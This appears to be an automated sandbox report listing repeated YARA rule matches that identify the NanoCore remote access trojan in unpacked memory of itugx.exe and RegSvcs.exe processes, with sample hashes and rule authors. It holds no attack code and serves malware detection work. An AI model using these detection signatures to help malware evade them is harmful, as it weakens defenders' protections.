      Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
